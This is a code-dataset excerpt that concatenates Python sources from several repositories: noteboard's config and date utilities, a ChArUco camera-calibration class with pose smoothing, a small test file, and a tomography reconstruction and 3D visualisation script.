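The `open`/`close` pair above keeps the shelf gzip-compressed on disk between sessions. A minimal sketch of that round-trip in isolation (the file names here are placeholders, not the module's real paths):
```python
import gzip
import shutil

def decompress(src_gz, dst):
    """Inflate src_gz into dst, mirroring Storage.open()."""
    with gzip.open(src_gz, "rb") as f_in, open(dst, "wb") as f_out:
        shutil.copyfileobj(f_in, f_out)

def compress(src, dst_gz):
    """Deflate src into dst_gz, mirroring Storage.close()."""
    with open(src, "rb") as f_in, gzip.open(dst_gz, "wb") as f_out:
        shutil.copyfileobj(f_in, f_out)
```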
#### File: noteboard/noteboard/utils.py
```python
import time
import datetime
import os
import json
import logging
DEFAULT = {
"StoragePath": "~/.noteboard/",
"DefaultBoardName": "Board",
"Tags": {
"default": "BLUE",
}
}
def get_time(fmt=None):
if fmt:
date = datetime.datetime.now().strftime(fmt) # str
else:
date = datetime.datetime.now().strftime("%a %d %b %Y") # str
timestamp = time.time()
return date, timestamp
def to_timestamp(date):
return int(time.mktime(date.timetuple()))
def to_datetime(ts):
return datetime.date.fromtimestamp(ts) # datetime instance
def time_diff(ts, reverse=False):
"""Get the time difference between the given timestamp and the current time."""
date = datetime.datetime.fromtimestamp(ts)
now = datetime.datetime.fromtimestamp(get_time()[1])
if reverse:
return date - now # datetime instance
return now - date # datetime instance
def add_date(days):
"""Get the datetime with `days` added to the current datetime."""
today = datetime.date.today()
date = today + datetime.timedelta(days=days)
return date # datetime instance
def setup_logger(path):
formatter = logging.Formatter("%(asctime)s [%(levelname)s] (%(funcName)s in %(filename)s) %(message)s", "")
handler = logging.FileHandler(path, mode="a+")
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger = logging.getLogger("noteboard")
logger.setLevel(logging.DEBUG)
if not logger.hasHandlers():
logger.addHandler(handler)
return logger
def init_config(path):
"""Initialise configurations file. If file already exists, it will be overwritten."""
with open(path, "w+") as f:
json.dump(DEFAULT, f, sort_keys=True, indent=4)
def load_config(path):
"""Load configurations file. If file does not exist, call `init_config()`."""
if not os.path.isfile(path):
init_config(path)
with open(path, "r+") as f:
config = json.load(f)
return config
``` |
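A quick usage sketch of the date helpers above, assuming the module is importable as `noteboard.utils`:
```python
from noteboard.utils import add_date, to_timestamp, to_datetime, time_diff

due = add_date(7)                   # datetime.date one week from today
ts = to_timestamp(due)              # int POSIX timestamp
print(to_datetime(ts))              # round-trips back to the same date
print(time_diff(ts, reverse=True))  # timedelta until the due date
```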
{
"source": "a1rb4Ck/camera_fusion",
"score": 3
} |
#### File: camera_fusion/camera_fusion/CameraCorrected.py
```python
from .Camera import Camera
from pathlib import Path
import numpy as np
from threading import Event, Thread
import time
import subprocess
import os
import sys
try:
import cv2
from cv2 import aruco
except ImportError:
raise ImportError('ERROR opencv-contrib-python must be installed!')
# TODO: implement height transform correction
# https://github.com/O-C-R/maproom-robots/tree/master/skycam
# TODO: AR example
# https://github.com/avmeer/ComputerVisionAugmentedReality
# Averaging
# ○ ArUco tags are hard to pick out perfectly each time
# ○ Position of the marker is noisy and subsequently the models would shake
# ○ Averaging the last three position matrices helped to stabilize the models.
def input_float(prompt=''):
"""Ask for a human float input.
Args:
prompt (string): Text to prompt as input.
"""
# try:
# return raw_input(prompt)
# except NameError:
# return input(prompt)
while True:
try:
float_input = float(input(prompt))
except ValueError:
print('Please enter a float.\n')
continue
else:
break
return float_input
class CameraCorrected(Camera):
"""CameraCorrected class used to setup and use a camera with lens correction.
Attributes:
aruco_dict_num (int): ChAruco dictionary number used for calibr.
board (CharucoBoard): ChAruco board object used for calibration.
cap (VideoCapture): OpenCV VideoCapture element.
cam_id (string): Camera or V4L id (ex: /dev/video0 /dev/v4l_by_id/...).
charuco_marker_size (float): Aruco marker length on the printed board.
charuco_square_length (float): black square length on the print.
focus (float): Camera focus value for camera which supports focusing.
height (int): Camera frame height in pixels.
width (int): Camera frame width in pixels.
camera_matrix (OpenCV matrix): OpenCV camera correction matrix.
dist_coeffs (OpenCV matrix): OpenCV distance correction coefficients.
corners (list): List of detected corners positions as a buffer.
ids (list): List of detected corners ids as a buffer.
board_post (PostureBuffer): Buffer to filter the posture of the board.
settings (list): List of OpenCV VideoCapture (v4l) settings.
thread_ready (Event): Thread is ready Event.
thread (threading.Thread): VideoCapture reading thread.
t0 (time.time): Time counter buffer.
"""
def __init__(self, cam_id, aruco_dict_num, focus=None, vertical_flip=None,
settings=None):
"""Initialize the CameraCorrected object variables.
Args:
cam_id (string): Camera or V4L id.
aruco_dict_num (int): ChAruco dictionary number used for calibr.
vertical_flip (bool): Trigger vertical frame flipping.
focus (float): Camera focus value for camera which supports focus.
settings (list): list of tuple with specific camera settings.
"""
Camera.__init__(self, cam_id, vertical_flip, settings)
self.focus = focus
# Corners points and identifiers buffers
self.aruco_dict_num = aruco_dict_num
self.corners = None
self.ids = None
# Moving/Rolling average posture filtering
# TODO: Low pass filtering on translation and rotation
self.board_post = PostureBuffer()
# Parameter files folder
if not Path('./data').exists():
os.makedirs('./data')
def initialize(self):
"""Set up camera and launch the calibration routine."""
self._setup()
# Camera correction
self.calibrate_camera_correction()
# Start the VideoCapture read() thread
self.stop = False
self.start_camera_thread()
self.thread_ready.wait()
# Quick test
self.test_camera()
print('Corrected camera %s initialization done!\n' % self.cam_id)
def calibrate_camera_correction(self):
"""Calibrate the camera lens correction."""
# Hints:
# https://github.com/opencv/opencv/blob/master/samples/python/calibrate.py
# https://longervision.github.io/2017/03/16/OpenCV/opencv-internal-calibration-chessboard/
# http://www.peterklemperer.com/blog/2017/10/29/opencv-charuco-camera-calibration/
# http://www.morethantechnical.com/2017/11/17/projector-camera-calibration-the-easy-way/
# https://mecaruco2.readthedocs.io/en/latest/notebooks_rst/Aruco/sandbox/ludovic/aruco_calibration_rotation.html
defaultConfig_path = Path('./data/defaultConfig.xml')
if defaultConfig_path.exists():
print(' Found defaultConfig.xml.\nCAUTION: be sure settings in d'
'efaultConfig.xml match the current hardware configuration.')
default_config = cv2.FileStorage(
str(defaultConfig_path), cv2.FILE_STORAGE_READ)
self.aruco_dict_num = int(
default_config.getNode('charuco_dict').real())
self.charuco_square_length = default_config.getNode(
'charuco_square_lenght').real() # ARGH, spelling mistake!
self.charuco_marker_size = default_config.getNode(
'charuco_marker_size').real()
self.width = int(default_config.getNode(
'camera_resolution').at(0).real())
self.height = int(default_config.getNode(
'camera_resolution').at(1).real())
default_config.release()
else:
self.write_defaultConfig()
aruco_dict = cv2.aruco.Dictionary_get(self.aruco_dict_num)
# Create a specific camera calibration if none already exists
# using the opencv_interactive-calibration program.
cameraParameters_path = Path(
'./data/cameraParameters_%s.xml' % self.cam_id)
if not cameraParameters_path.exists():
print('\nStarting the camera id%s lens calibration.' % self.cam_id)
self.cap.release() # Release VideoCapture before CLI usage
subprocess.call(
['opencv_interactive-calibration', '-d=0.25', '-h=7', '-w=5',
'-sz=%f' % self.charuco_square_length, '--t=charuco',
'-pf=' + str(defaultConfig_path),
'-ci=' + str(self.cam_id),
'-of=' + str(cameraParameters_path),
'-flip=' + str(self.vertical_flip).lower()])
if sys.platform == "linux" or platform == "linux2":
self.cap = cv2.VideoCapture(self.cam_path, cv2.CAP_V4L2)
else:
self.cap = cv2.VideoCapture(self.cam_id)
self.set_camera_settings() # Re-set camera settings
# Load the camera calibration file.
if cameraParameters_path.exists():
print(' Found cameraParameters_%s.xml' % self.cam_id)
calibration_file = cv2.FileStorage(
str(cameraParameters_path), cv2.FILE_STORAGE_READ)
self.camera_matrix = calibration_file.getNode('cameraMatrix').mat()
self.dist_coeffs = calibration_file.getNode('dist_coeffs').mat()
self.width = int(calibration_file.getNode(
'cameraResolution').at(0).real())
self.height = int(calibration_file.getNode(
'cameraResolution').at(1).real())
if calibration_file.getNode('focus').isReal(): # If focus val
self.focus = float(calibration_file.getNode('focus').real())
self.set_focus(self.focus * 50)
# Specific Fish-Eye parameters
# self.r = calibrationParams.getNode("R").mat()
# self.new_camera_matrix = calibrationParams.getNode(
# "newCameraMatrix").mat()
calibration_file.release()
else:
raise ValueError(
"cameraParameters_%s.xml not found!\n\t"
"Please finish the calibration and press 's' to save to file."
% self.cam_id)
self.board = cv2.aruco.CharucoBoard_create(
5, 7, self.charuco_square_length, self.charuco_marker_size,
aruco_dict)
print('Camera %s calibration correction done!' % self.cam_id)
def detect_markers(self):
"""Detect ChAruco markers.
Returns:
frame (OpenCV Mat): A frame read from the VideoCapture method.
corners (Numpy array): list of corners 2D coordinates.
ids (Numpy array): list of detected marker identifiers.
"""
parameters = cv2.aruco.DetectorParameters_create()
frame = self.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
corners, ids, rej = cv2.aruco.detectMarkers(
gray, self.board.dictionary, parameters=parameters)
corners, ids, rej, recov = cv2.aruco.refineDetectedMarkers(
gray, self.board, corners, ids, rej,
cameraMatrix=self.camera_matrix, distCoeffs=self.dist_coeffs)
return frame, corners, ids
def estimate_board_posture(self, frame=None, corners=None, ids=None):
"""Estimate ChAruco board posture.
Arguments:
frame (OpenCV Mat): A frame read from the VideoCapture method.
corners (Numpy array): list of corners 2D coordinates.
ids (Numpy array): list of detected marker identifiers.
Return:
frame (OpenCV Mat): Frame with the board posture drawn
"""
# If we have not already detected markers:
if frame is None:
frame, corners, ids = self.detect_markers()
if ids is None: # No detected marker
frame = self.draw_text(frame, 'No ChAruco marker detected!')
# time.sleep(0.1) # Sleep to give the time to move the panel
else: # if there is at least one marker detected
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Draw axis for the global board
retval, cha_corns, cha_ids = cv2.aruco.interpolateCornersCharuco(
corners, ids, gray, self.board,
cameraMatrix=self.camera_matrix, distCoeffs=self.dist_coeffs)
if retval:
frame_with_board = cv2.aruco.drawDetectedCornersCharuco(
frame, cha_corns, cha_ids, (0, 255, 0))
# Posture estimation of the global ChAruco board
retval, rvecs, tvecs = cv2.aruco.estimatePoseCharucoBoard(
cha_corns, cha_ids, self.board,
self.camera_matrix, self.dist_coeffs)
if retval is True:
rvecs, tvecs = self.board_post.update(rvecs, tvecs)
frame = cv2.aruco.drawAxis(
frame_with_board, self.camera_matrix, self.dist_coeffs,
rvecs, tvecs, 4 * self.charuco_square_length)
else:
frame = self.draw_text(
frame, 'Not enough Charuco markers detected.')
else:
frame = self.draw_text(
frame, 'Not enough resolution. Board is too far.')
return frame
def estimate_markers_posture(self, frame=None, corners=None, ids=None):
"""Estimate ChAruco markers posture.
Arguments:
frame (OpenCV Mat): A frame read from the VideoCapture method.
corners (Numpy array): list of corners 2D coordinates.
ids (Numpy array): list of detected marker identifiers.
Return:
frame (OpenCV Mat): Frame with all detected markers posture drawn.
"""
# If we have not already detected markers:
if frame is None:
frame, corners, ids = self.detect_markers()
if ids is None: # No detected marker
frame = self.draw_text(frame, 'No ChAruco marker detected!')
# time.sleep(0.1) # Sleep to give the time to move the panel
else: # if there is at least one marker detected
# Draw each detected marker
frame = cv2.aruco.drawDetectedMarkers(frame, corners, ids)
rvecs, tvecs, _objPoints = cv2.aruco.estimatePoseSingleMarkers(
corners, self.charuco_square_length,
self.camera_matrix, self.dist_coeffs)
# Draw axis for each marker
for rvec, tvec in zip(rvecs, tvecs):
frame = cv2.aruco.drawAxis(
frame, self.camera_matrix, self.dist_coeffs,
rvec, tvec, self.charuco_square_length)
return frame
def estimate_board_and_markers_posture(self):
"""Estimate posture of ChAruco markers and posture of global board.
Return:
frame (OpenCV Mat): Frame with the board and markers postures.
"""
frame, corners, ids = self.detect_markers()
frame = self.estimate_markers_posture(frame, corners, ids)
frame = self.estimate_board_posture(frame, corners, ids)
return frame
# def py_charuco_camera_calibration(self):
# """TODO: camera calibration with Python."""
# parameters = cv2.aruco.DetectorParameters_create()
# corners_list = []
# ids_list = []
# print('Move the charuco board in front of the', self.cam_id)
# while len(corners_list) < 50:
# frame = self.read()
# gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# corners, ids, rej = cv2.aruco.detectMarkers(
# gray, dictionary=aruco_dict, parameters=parameters)
# corners, ids, rej, recovered = cv2.aruco.refineDetectedMarkers(
# gray, cv2.aruco, corners, ids, rej,
# cameraMatrix=self.camera_matrix, distCoeffs=self.dist_coef)
# if corners is None or len(corners) == 0:
# print('No ChAruco corner detected!')
# continue
# ret, corners, ids = cv2.aruco.interpolateCornersCharuco(
# corners, ids, gray, cb)
# corners_list.append(corners)
# ids_list.append(ids)
# time.sleep(0.1) # Sleep to give the time to move the panel
# print('Enough frames for %s calibration!' % self.cam_id)
# # Calibrate camera
# ret, K, dist_coef, rvecs, tvecs = cv2.aruco.calibrateCameraCharuco(
# corners_list, ids_list, cv2.aruco, (w, h), K,
# dist_coef, flags=cv2.CALIB_USE_INTRINSIC_GUESS)
# print('camera calib mat after\n%s' % K)
# print('camera dist_coef %s' % dist_coef.T)
# print('calibration reproj err %s' % ret)
# distCoeffsInit = np.zeros((5, 1))
# flags = (cv2.CALIB_USE_INTRINSIC_GUESS + cv2.CALIB_RATIONAL_MODEL + cv2.CALIB_FIX_ASPECT_RATIO) # noqa
# # flags = (cv2.CALIB_RATIONAL_MODEL)
# (ret, camera_matrix, distortion_coefficients0,
# rotation_vectors, translation_vectors,
# stdDeviationsIntrinsics, stdDeviationsExtrinsics,
# perViewErrors) = cv2.aruco.calibrateCameraCharucoExtended(
# charucoCorners=allCorners, charucoIds=allIds, board=board,
# imageSize=imsize, cameraMatrix=cameraMatrixInit,
# distCoeffs=distCoeffsInit, flags=flags, criteria=(
# cv2.TERM_CRITERIA_EPS & cv2.TERM_CRITERIA_COUNT, 10000, 1e-9))
def read_undistort(self):
"""Read an undistored camera frame."""
return cv2.undistort(
src=self.read(), cameraMatrix=self.camera_matrix,
distCoeffs=self.dist_coeffs)
def save_focus(self):
"""Save the camera focus value to the cameraParameters.xml file."""
if self.focus:
cameraParameters_path = Path(
'./data/cameraParameters_%s.xml' % self.cam_id)
self.write_append_to_FileStorage(
str(cameraParameters_path),
string='<focus>%f</focus>\n' % self.focus)
def set_focus(self, focus):
"""Set camera focus."""
self.cap.set(28, focus * 0.02) # CV_CAP_PROP_FOCUS
# min: 0.0 (infinity), max: 1.0 (1cm), increment:0.02 for C525 & C920
self.focus = self.cap.get(28)
print('Camera %s | Focus set: %f' % (self.cam_id, self.focus))
def show_focus_window(self):
"""Show a window with a focus slider."""
cv2.namedWindow('Focus', cv2.WINDOW_FREERATIO)
cv2.resizeWindow('Focus', 600, 30)
focus = self.focus
cv2.createTrackbar('Camera %s focus' % self.cam_id, 'Focus', 0, 20,
self.set_focus)
if focus:
cv2.setTrackbarPos('Camera %s focus' % self.cam_id, 'Focus',
int(focus * 50))
def write_append_to_FileStorage(self, str_path, string):
"""Append a string to a .xml file opened with cv2.FileStorage.
Args:
str_path (str): the file path to append.
string (str): the string to append.
"""
f = open(str_path, 'r+')
ln = f.readline()
while ln != '</opencv_storage>\n':
ln = f.readline()
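# Seek back over the final '</opencv_storage>\n' line (18 characters)
# so the new element is written just before the closing tag.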
f.seek(f.tell() - 18)
f.write(string)
f.write('</opencv_storage>\n')
f.close()
def write_defaultConfig(self):
"""Write defaultConfig.xml with the ChAruco specific parameters."""
print('\n')
self.charuco_square_length = input_float(
'Enter the black square length in cm: ')
self.charuco_marker_size = input_float(
'Enter the Aruco marker length in cm: ')
defaultConfig_path = Path('./data/defaultConfig.xml')
file = cv2.FileStorage(
str(defaultConfig_path), cv2.FILE_STORAGE_WRITE)
file.write('charuco_dict', self.aruco_dict_num)
file.write('charuco_square_lenght', self.charuco_square_length)
# ARGH, spelling mistake in the opencv_interactive-calibration app..
# https://github.com/opencv/opencv/blob/master/apps/interactive-calibration/parametersController.cpp#L40
file.write('charuco_marker_size', self.charuco_marker_size)
file.write('max_frames_num', 40)
file.write('min_frames_num', 20)
# To write a right <camera_resolution> element we need to update
# OpenCV to add std::vect<int> support, see my fork and discussion:
# https://github.com/a1rb4Ck/opencv/commit/58a9adf0dd8ed5a7f1f712e99bf0f7b1340f39a8
# http://answers.opencv.org/question/199743/write-sequence-of-int-with-filestorage-in-python/
#
# Working code with the fork:
# file.write('camera_resolution', (
# [self.width, self.height]))
#
# <camera_resolution> is a Seq of Integers. In C++ it is written by <<
# Python bindings must be added to support seq of int as std::vect<int>
file.release()
# Without updating OpenCV, we seek to append <camera_resolution>
self.write_append_to_FileStorage(
str(defaultConfig_path),
string='<camera_resolution>\n %d %d</camera_resolution>\n' % (
self.width, self.height))
class PostureBuffer(object):
"""PostureBuffer class used to setup and use camera with lens correction.
Attributes:
window_length (int): Moving average window size (number of frames).
avg_max_std (float): Maximum moving average standard deviation.
buff_rvecs (Numpy array): Buffer of rotation vecs for the moving avg filter.
buff_tvecs (Numpy array): Buffer of translation vecs for the moving avg filter.
"""
def __init__(self, window_length=4, avg_max_std=0.1):
"""Initialize PostureBuffer class.
Args:
window_length (int): Moving average window size (number of frames).
avg_max_std (float): Maximum moving average standard deviation.
"""
self.window_length = window_length
self.avg_max_std = avg_max_std
self.buff_tvecs = None # TODO: pre-allocate array of window_length
self.buff_rvecs = None
def update(self, rvecs, tvecs):
"""Update the moving average posture buffer and do the filtering.
Arguments:
rvecs (Numpy array): Posture rotation vectors (3x1).
tvecs (Numpy array): Posture translation vectors (3x1).
Returns:
rvecs (Numpy array): Filtered (averaged) posture rotation vectors.
tvecs (Numpy array): Filtered (avg) posture translation vectors.
"""
# Notes:
# https://github.com/avmeer/ComputerVisionAugmentedReality
# ○ ArUco tags are hard to pick out perfectly each time.
# ○ Position of the marker is noisy and the models would shake.
# ○ Averaging the last THREE position matrices helped to stabilize.
# Appending rvec and tvec postures to buffer
if self.buff_rvecs is None:
self.buff_rvecs = rvecs
else:
self.buff_rvecs = np.append(self.buff_rvecs, rvecs, axis=1)
if self.buff_tvecs is None:
self.buff_tvecs = tvecs
else:
self.buff_tvecs = np.append(self.buff_tvecs, tvecs, axis=1)
if self.buff_rvecs.shape[1] > self.window_length:
self.buff_rvecs = np.delete(self.buff_rvecs, 0, 1)
if self.buff_tvecs.shape[1] > self.window_length:
self.buff_tvecs = np.delete(self.buff_tvecs, 0, 1)
# TODO: optimize delete without copying? But np.array are immutable..
# Standard deviation filtering, in case the board had too big a displacement.
stdm = self.avg_max_std # Moving/Rolling average filter max std
rvecs_std = np.std(self.buff_rvecs, axis=1)
if rvecs_std[0] > stdm or rvecs_std[1] > stdm or rvecs_std[2] > stdm:
self.buff_rvecs = rvecs
else:
rvecs = np.mean(self.buff_rvecs, axis=1)
tvecs_std = np.std(self.buff_tvecs, axis=1)
if tvecs_std[0] > stdm or tvecs_std[1] > stdm or tvecs_std[2] > stdm:
self.buff_tvecs = tvecs
else:
tvecs = np.mean(self.buff_tvecs, axis=1)
return rvecs, tvecs
```
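To see the posture filter in isolation, here is a small sketch feeding synthetic noisy postures through `PostureBuffer`; it assumes only numpy and the class above, and the vector values are made up:
```python
import numpy as np

buf = PostureBuffer(window_length=4, avg_max_std=0.1)
rng = np.random.default_rng(0)
for _ in range(6):
    # Simulated detections: a fixed pose plus small per-frame noise
    rvecs = np.array([[0.5], [0.1], [0.0]]) + rng.normal(0, 0.01, (3, 1))
    tvecs = np.array([[1.0], [2.0], [3.0]]) + rng.normal(0, 0.01, (3, 1))
    rvecs, tvecs = buf.update(rvecs, tvecs)  # returns the rolling-average pose
print(rvecs, tvecs)  # close to the fixed pose, with the jitter averaged out
```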
#### File: camera_fusion/tests/test_CamerasFusion.py
```python
import os
import sys
import numpy as np
sys.path.insert(
0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import camera_fusion # noqa
# Import tests
def test_import_CamerasFusion():
"""Test CamerasFusion class importation."""
a = camera_fusion.CamerasFusion.__module__ == 'camera_fusion.CamerasFusion'
assert a
# CamerasFusion tests
# TODO: test CamerasFusion points matching
``` |
{
"source": "a1rb4Ck/tomo",
"score": 2
} |
#### File: a1rb4Ck/tomo/tomo_prod.py
```python
from __future__ import print_function, division
try:
import re # for string processing
import os
from pathlib import Path
import sys # for folder scanning
import joblib # joblib version: 0.9.4
import time # for performance timing
import numpy as np # for matrix works
import PIL # for image resizing
from PIL import Image
import matplotlib.pyplot as plt
import progressbar
import tomopy # for inverse tomography transformation
# import vtk #for 3D visualization but can't compile it on my Sierra
# import PyOpenGL #for 3D visualization using full OpenGL functionality available on your system
import PyQt5 # for vispy visualisation
from itertools import cycle
import vispy # for interractive 3D plotting
from vispy import app, scene, io
from vispy.scene.visuals import Text
from vispy.color import get_colormaps, BaseColormap
from vispy.visuals.transforms import (
STTransform, PolarTransform, AffineTransform)
# from vispy.visuals.transforms import MatrixTransform #MatrixTransform is used for volume rotation #TODO: wait VisPy 0.5.0 to re-add MatrixTransform
import imageio # for .gif recording
except ImportError as exc:
sys.stderr.write("Error importing dependancies: ({})".format(exc))
m = re.search('\'(.+?)\'', format(exc))
    print('You need some libraries! Please try to install them by running:')
print('pip install %s' % m.group(1))
def get_images():
# CREATE TOMOGRAPHIC IMAGES MATRIX FROM FILES
input_dir = './raw_input/'
print('Let\'s create tomomatrix from raw images')
print('input directory:' + input_dir)
print('Reshaping image to size %d x %d pixels' % (img_size, img_size))
tclass = [d for d in os.listdir(input_dir)]
# tclass = tclass[0:202] #we only need 202 images to do a 180deg rotation
measurements_matrix = []
counter = 0
writer = imageio.get_writer('raw_tomo.mp4', fps=50, quality=8)
bar_crop = progressbar.ProgressBar(
redirect_stdout=True, max_value=len(tclass))
bar_crop.start()
for x in tclass:
try:
img = Image.open(os.path.join(input_dir + '/' + x))
# Hand crafted cropping values: #TODO: automate or make user selectable
# bottom-500
img = img.crop((1300, 1700, img.size[0] - 550, img.size[1] - 600))
img = img.resize((int(img_size), int(img_size)), Image.ANTIALIAS)
measurements_matrix.append(np.asarray(img))
writer.append_data(np.asarray(img))
except Exception:
print("Error resize file : %s - %s " % x)
counter += 1
bar_crop.update(counter)
bar_crop.finish()
writer.close()
# Now we have 400 images (256,256)
mat = np.array(measurements_matrix)
print('tomo matrix created! %d images resized. A rotation .mp4 was also created!' % counter)
# Let's save our measurements_matrix
joblib.dump(mat, 'TOMO_360_angle_images.pkl')
print('tomo matrix saved to TOMO_360_angle_images.pkl')
# First dimension: Capture angles
# Second dimension: Image width X
# Third dimension: Image height Y
def sample_stack_Angles(stack, rows=5, cols=5, start_with=0, show_every=16, algo='default'):
# Displaying all images :
fig, ax = plt.subplots(rows, cols, figsize=[12, 12])
for i in range(rows * cols):
ind = start_with + i * show_every
ax[int(i / rows), int(i % rows)].set_title('Angle %g°' % (ind * 0.9))
ax[int(i / rows), int(i % rows)
].imshow(stack[ind, :, :], cmap=plt.cm.Greys_r)
ax[int(i / rows), int(i % rows)].axis('off')
#plt.suptitle('%s images' % algo, fontsize=20)
plt.tight_layout()
plt.savefig('%s_360_angles.png' % algo, dpi=300)
plt.close()
def sample_stack_proj_Angles(obj, angles, rows=5, cols=5, start_with=0, show_every=16, algo='default'):
sim = tomopy.project(obj, angles) # Calculate projections
fig, ax = plt.subplots(rows, cols, figsize=[12, 12])
for i in range(rows * cols):
ind = start_with + i * show_every
ax[int(i / rows), int(i % rows)].set_title('Angle %g°' % (ind * 0.9))
ax[int(i / rows), int(i % rows)
].imshow(sim[ind, :, :], cmap=plt.cm.Greys_r)
ax[int(i / rows), int(i % rows)].axis('off')
#plt.suptitle('%s images' % algo, fontsize=20)
plt.tight_layout()
plt.savefig('%s_proj_360_angles.png' % algo, dpi=300)
plt.close()
def sample_stack_Z(stack, rows=4, cols=4, start_with=0, show_every=16, algo='default'):
# Slice display from https://www.raddq.com/dicom-processing-segmentation-visualization-in-python/
fig, ax = plt.subplots(rows, cols, figsize=[12, 12])
for i in range(rows * cols):
ind = start_with + i * show_every
ax[int(i / rows), int(i % rows)].set_title('slice %d' % ind)
ax[int(i / rows), int(i % rows)
].imshow(stack[ind, :, :], cmap=plt.cm.Greys_r)
ax[int(i / rows), int(i % rows)].axis('off')
#plt.suptitle('Reconstructed Z slice', fontsize=20)
plt.tight_layout()
plt.savefig('%s_Z_stack_360_.png' % algo, dpi=300)
plt.close()
# - - - - - - - - - - - - - - VisPy 3D visualization - - - - - - - - - - - - - - - -
# create colormaps that work well for translucent and additive volume rendering
class TransFire(BaseColormap):
glsl_map = """
vec4 translucent_fire(float t) {
return vec4(pow(t, 0.5), t, t*t, max(0, t*1.05 - 0.05));
}
"""
class TransGrays(BaseColormap):
glsl_map = """
vec4 translucent_grays(float t) {
return vec4(t, t, t, t*0.05);
}
"""
def scene_building(recon_algos):
# Prepare canvas
canvas = scene.SceneCanvas(keys='interactive', size=(1024, 768), show=True)
# canvas.measure_fps()
# Set up a viewbox to display the image with interactive pan/zoom
view = canvas.central_widget.add_view()
# Set whether we are emulating a 3D texture
emulate_texture = False
# Create the volume visuals for the different reconstructions
volume1 = scene.visuals.Volume(recon_algos[0], parent=view.scene, threshold=0.225,
emulate_texture=emulate_texture)
volume2 = scene.visuals.Volume(recon_algos[1], parent=view.scene, threshold=0.225,
emulate_texture=emulate_texture)
volume3 = scene.visuals.Volume(recon_algos[2], parent=view.scene, threshold=0.225,
emulate_texture=emulate_texture)
volume4 = scene.visuals.Volume(recon_algos[3], parent=view.scene, threshold=0.225,
emulate_texture=emulate_texture)
volume5 = scene.visuals.Volume(recon_algos[4], parent=view.scene, threshold=0.225,
emulate_texture=emulate_texture)
#volume1.transform = scene.STTransform(translate=(64, 64, 0))
# Hacky cyclic volume display setup:
volume1.visible = True # set first volume as visible, then switch with 3
volume2.visible = False
volume3.visible = False
volume4.visible = False
volume5.visible = False
t1 = Text('ART reconstruction', parent=canvas.scene, color='white')
t1.font_size = 18
t1.pos = canvas.size[0] // 2, canvas.size[1] - 10
t2 = Text('fbp reconstruction', parent=canvas.scene, color='white')
t2.font_size = 18
t2.pos = canvas.size[0] // 2, canvas.size[1] - 10
t3 = Text('sirt reconstruction', parent=canvas.scene, color='white')
t3.font_size = 18
t3.pos = canvas.size[0] // 2, canvas.size[1] - 10
t4 = Text('ospml_quad reconstruction', parent=canvas.scene, color='white')
t4.font_size = 18
t4.pos = canvas.size[0] // 2, canvas.size[1] - 10
t5 = Text('pml_quad reconstruction', parent=canvas.scene, color='white')
t5.font_size = 18
t5.pos = canvas.size[0] // 2, canvas.size[1] - 10
t1.visible = True
t2.visible = False
t3.visible = False
t4.visible = False
t5.visible = False
# Implement axis connection with cam2
@canvas.events.mouse_move.connect
def on_mouse_move(event):
if event.button == 1 and event.is_dragging:
axis.transform.reset()
axis.transform.rotate(cam2.roll, (0, 0, 1))
axis.transform.rotate(cam2.elevation, (1, 0, 0))
axis.transform.rotate(cam2.azimuth, (0, 1, 0))
axis.transform.scale((50, 50, 0.001))
axis.transform.translate((50., 50.))
axis.update()
# Implement key presses
@canvas.events.key_press.connect
def on_key_press(event):
global opaque_cmap, translucent_cmap
if event.text == '1':
cam_toggle = {cam1: cam2, cam2: cam3, cam3: cam1}
view.camera = cam_toggle.get(view.camera, cam2)
print(view.camera.name + ' camera')
if view.camera is cam2:
axis.visible = True
else:
axis.visible = False
elif event.text == '2':
methods = ['mip', 'translucent', 'iso', 'additive']
method = methods[(methods.index(volume1.method) + 1) % 4]
print("Volume render method: %s" % method)
cmap = opaque_cmap if method in [
'mip', 'iso'] else translucent_cmap
volume1.method = method
volume1.cmap = cmap
elif event.text == '3':  # hacky toggle between different reconstructed volumes
if(volume1.visible):
volume1.visible = False
volume2.visible = True
t1.visible = False
t2.visible = True
# t1.update()
elif(volume2.visible):
volume2.visible = False
volume3.visible = True
t2.visible = False
t3.visible = True
elif(volume3.visible):
volume3.visible = False
volume4.visible = True
t3.visible = False
t4.visible = True
elif(volume4.visible):
volume4.visible = False
volume5.visible = True
t4.visible = False
t5.visible = True
else:
volume5.visible = False
volume1.visible = True
t5.visible = False
t1.visible = True
elif event.text == '4':
if volume1.method in ['mip', 'iso']:
cmap = opaque_cmap = next(opaque_cmaps)
else:
cmap = translucent_cmap = next(translucent_cmaps)
volume1.cmap = volume2.cmap = volume3.cmap = volume4.cmap = volume5.cmap = cmap
elif event.text == '0':
cam1.set_range()
cam3.set_range()
elif event.text != '' and event.text in '[]':
s = -0.025 if event.text == '[' else 0.025
volume1.threshold += s
#volume2.threshold += s
th = volume1.threshold if volume1.visible else volume2.threshold
print("Isosurface threshold: %0.3f" % th)
# for testing performance
# @canvas.connect
# def on_draw(ev):
# canvas.update()
# @canvas.connect
# def on_timer(ev):
# # Animation speed based on global time.
# t = event.elapsed
# c = Color(self.color).rgb
# # Simple sinusoid wave animation.
# s = abs(0.5 + 0.5 * math.sin(t))
# self.context.set_clear_color((c[0] * s, c[1] * s, c[2] * s, 1))
# self.update()
# Create three cameras (Fly, Turntable and Arcball)
fov = 60.
cam1 = scene.cameras.FlyCamera(parent=view.scene, fov=fov, name='Fly')
cam2 = scene.cameras.TurntableCamera(parent=view.scene, fov=fov,
name='Turntable')
cam3 = scene.cameras.ArcballCamera(
parent=view.scene, fov=fov, name='Arcball')
view.camera = cam2 # Select turntable at first
# Create an XYZAxis visual
axis = scene.visuals.XYZAxis(parent=view)  # or simply view.scene
s = STTransform(translate=(50, 50), scale=(50, 50, 50, 1))
affine = s.as_affine()
axis.transform = affine
# Setup colormap iterators
opaque_cmaps = cycle(get_colormaps())
translucent_cmaps = cycle([TransFire(), TransGrays()])
opaque_cmap = next(opaque_cmaps)
translucent_cmap = next(translucent_cmaps)
# TODO: add a colorbar, fix error: AttributeError: module 'vispy.scene' has no attribute 'ColorBarWidget'
#grid = canvas.central_widget.add_grid(margin=10)
# cbar_widget = scene.ColorBarWidget(cmap=translucent_cmaps, orientation="right") #cmap="cool"
# grid.add_widget(cbar_widget)
# cbar_widget.pos = (800, 600)#(300, 100)
# cbar_widget.border_color = "#212121"
